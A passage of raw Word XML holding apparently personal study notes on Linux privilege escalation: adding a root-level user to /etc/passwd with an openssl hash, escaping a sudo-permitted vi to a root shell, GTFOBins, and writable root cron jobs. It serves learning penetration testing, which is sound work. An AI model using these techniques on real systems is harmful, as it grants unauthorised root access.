    <w:p w14:paraId="2FDF1597" w14:textId="3FD4C466" w:rsidR="00AF3B36" w:rsidRPr="0084205E" w:rsidRDefault="00AF3B36" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> passwd -1 -salt [salt][password]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607F5F95" w14:textId="6F0ABBAD" w:rsidR="00AF3B36" w:rsidRPr="0084205E" w:rsidRDefault="00AF3B36" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>don’t include the brackets like a dolt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CEC6D9" w14:textId="6D91747F" w:rsidR="00AF3B36" w:rsidRPr="0084205E" w:rsidRDefault="00AF3B36" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>take value and create user account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002F2C91" w14:textId="33F3F917" w:rsidR="004C151A" w:rsidRPr="0084205E" w:rsidRDefault="004C151A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>nano /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A7AEC3" w14:textId="3AC8D015" w:rsidR="004C151A" w:rsidRPr="0084205E" w:rsidRDefault="004C151A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>new:&lt;hash</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;:0:0</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>:root:/root:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC41877" w14:textId="6B64A557" w:rsidR="00AF3B36" w:rsidRPr="0084205E" w:rsidRDefault="00AF3B36" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>set UID, GID, shell to root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F27F4AB" w14:textId="44E38F05" w:rsidR="00AF3B36" w:rsidRPr="0084205E" w:rsidRDefault="00AF3B36" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>allow login as root user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F2810A" w14:textId="6D5F38BF" w:rsidR="004C151A" w:rsidRPr="0084205E" w:rsidRDefault="004C151A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Escaping Vi Editor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7910ECA5" w14:textId="27851CF0" w:rsidR="004C151A" w:rsidRPr="0084205E" w:rsidRDefault="00285B03" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sudo -l to determine what list of commands you’re able to use as a super user on that account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B3E8A6" w14:textId="4D90B82D" w:rsidR="00285B03" w:rsidRPr="0084205E" w:rsidRDefault="00285B03" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>occasionally find certain commands can be run as a root user without root password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F66D0A" w14:textId="1B464862" w:rsidR="00285B03" w:rsidRPr="0084205E" w:rsidRDefault="00285B03" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">enable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72538B26" w14:textId="21E8DF92" w:rsidR="00285B03" w:rsidRPr="0084205E" w:rsidRDefault="00285B03" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Escaping Vi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD5A36D" w14:textId="721ADB12" w:rsidR="00285B03" w:rsidRPr="0084205E" w:rsidRDefault="00285B03" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ex. running this command shows user8 can run vi with root privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B53469E" w14:textId="7D6ECE50" w:rsidR="00285B03" w:rsidRPr="0084205E" w:rsidRDefault="00285B03" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ex. (root) NOPASSWD: /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/bin/vi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEDD657" w14:textId="036E59F4" w:rsidR="00285B03" w:rsidRPr="0084205E" w:rsidRDefault="00285B03" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">open vi via </w:t>
      </w:r>
      <w:r w:rsidR="00F836D3" w:rsidRPr="0084205E">
        <w:t>sudo vi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEA1A4D" w14:textId="12E11BFC" w:rsidR="00F836D3" w:rsidRPr="0084205E" w:rsidRDefault="00F836D3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>type :!</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> to create a shell to get root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E95A17C" w14:textId="1EA313FF" w:rsidR="00285B03" w:rsidRPr="0084205E" w:rsidRDefault="00285B03" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Misconfigured Binaries and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>GTFOBins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7142F35A" w14:textId="3F3422DC" w:rsidR="00285B03" w:rsidRPr="0084205E" w:rsidRDefault="00285B03" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">if found during enumeration, or check what binaries a user account you have access </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>to can</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2A31D4" w14:textId="7DD3F6B0" w:rsidR="00285B03" w:rsidRPr="0084205E" w:rsidRDefault="00285B03" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">good place to look up exploits for them is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>GTFOBins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="47ABB393" w14:textId="028FBF88" w:rsidR="00285B03" w:rsidRPr="0084205E" w:rsidRDefault="00285B03" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>list of Unix binaries that can be exploited by an attacker to bypass local security restrictions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB36D2A" w14:textId="325B86BB" w:rsidR="00285B03" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidR="00F836D3" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://gtfobins.github.io/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="269F98FA" w14:textId="1BEB59DF" w:rsidR="00F836D3" w:rsidRPr="0084205E" w:rsidRDefault="00F836D3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Exploiting Crontab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE37703" w14:textId="3EB6C249" w:rsidR="00F836D3" w:rsidRPr="0084205E" w:rsidRDefault="00F836D3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>daemon that is a long-running process that executes commands at specific dates and times</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0448378D" w14:textId="0A5C66FA" w:rsidR="00F836D3" w:rsidRPr="0084205E" w:rsidRDefault="00F836D3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>can create file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E73693" w14:textId="59877238" w:rsidR="00F836D3" w:rsidRPr="0084205E" w:rsidRDefault="00F836D3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>How to view Cronjobs that are active</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C35AEDA" w14:textId="5BB44D2F" w:rsidR="00F836D3" w:rsidRPr="0084205E" w:rsidRDefault="00F836D3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/crontab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F01E555" w14:textId="1608CB7C" w:rsidR="00F836D3" w:rsidRPr="0084205E" w:rsidRDefault="00F836D3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>always recommended to check manually</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A731083" w14:textId="43BCCB08" w:rsidR="00F836D3" w:rsidRPr="0084205E" w:rsidRDefault="00F836D3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Format of Cronjob</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC5D7F6" w14:textId="2184EF8B" w:rsidR="00F836D3" w:rsidRPr="0084205E" w:rsidRDefault="00F836D3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t># - ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E66098" w14:textId="3D6F5BDF" w:rsidR="00F836D3" w:rsidRPr="0084205E" w:rsidRDefault="00F836D3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>m – minute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5680FD42" w14:textId="7868387E" w:rsidR="00F836D3" w:rsidRPr="0084205E" w:rsidRDefault="00F836D3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>h – hour</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5061973A" w14:textId="68C72998" w:rsidR="00F836D3" w:rsidRPr="0084205E" w:rsidRDefault="00F836D3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>dom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – day of the month</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B93AB73" w14:textId="449B1100" w:rsidR="00F836D3" w:rsidRPr="0084205E" w:rsidRDefault="00F836D3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – month</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A280329" w14:textId="7AEAA720" w:rsidR="00F836D3" w:rsidRPr="0084205E" w:rsidRDefault="00F836D3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>dow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – day of the week</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171A5FE7" w14:textId="5CD9114A" w:rsidR="00F836D3" w:rsidRPr="0084205E" w:rsidRDefault="00F836D3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>user – what user the command will run as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E791DE0" w14:textId="71A25726" w:rsidR="00F836D3" w:rsidRPr="0084205E" w:rsidRDefault="00F836D3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>command – what command should be run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF64F54" w14:textId="0199B695" w:rsidR="00F836D3" w:rsidRPr="0084205E" w:rsidRDefault="00F836D3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FE1A12" w14:textId="7620E24E" w:rsidR="00F836D3" w:rsidRPr="0084205E" w:rsidRDefault="00F836D3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"># m h </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>dom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>dow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> user command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6696C85D" w14:textId="5C2B4B77" w:rsidR="00F836D3" w:rsidRPr="0084205E" w:rsidRDefault="0000598C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">17* 1   *       *      *   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>root  cd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/&amp;&amp;run-parts - -report /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>cron.hourly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="03FAFA83" w14:textId="487C2843" w:rsidR="0000598C" w:rsidRPr="0084205E" w:rsidRDefault="0000598C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>how to exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E217A30" w14:textId="2D427456" w:rsidR="0000598C" w:rsidRPr="0084205E" w:rsidRDefault="0000598C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>certain files found in Crontab may be owned by root and run with root privileges but can be written by users</w:t>
      </w:r>
    </w:p>
